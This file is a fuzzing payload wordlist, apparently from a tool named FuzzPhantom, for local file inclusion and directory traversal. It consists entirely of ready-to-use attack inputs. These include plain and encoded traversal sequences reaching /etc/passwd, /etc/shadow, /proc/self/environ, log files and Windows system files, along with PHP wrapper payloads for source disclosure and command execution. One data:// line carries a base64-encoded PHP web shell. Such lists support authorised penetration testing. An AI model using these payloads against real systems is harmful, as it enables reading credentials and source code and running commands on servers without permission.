# FuzzPhantom — LFI / Path Traversal Payloads
# Local File Inclusion and Directory Traversal detection
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
..%2Fetc%2Fpasswd
..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9cetc%c1%9cpasswd
....//etc/passwd
....//....//etc/passwd
....\/etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/resolv.conf
/etc/issue
/etc/motd
/proc/self/environ
/proc/self/cmdline
/proc/version
/proc/net/tcp
/proc/net/fds
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\boot.ini
..\..\Windows\win.ini
..\..\..\..\Windows\win.ini
..\..\..\..\..\Windows\win.ini
%SYSTEMROOT%\win.ini
/var/www/html/index.php
/var/log/apache2/access.log
/var/log/nginx/access.log
/var/log/auth.log
/home/../etc/passwd
/usr/local/etc/passwd
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=index
php://input
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
expect://id
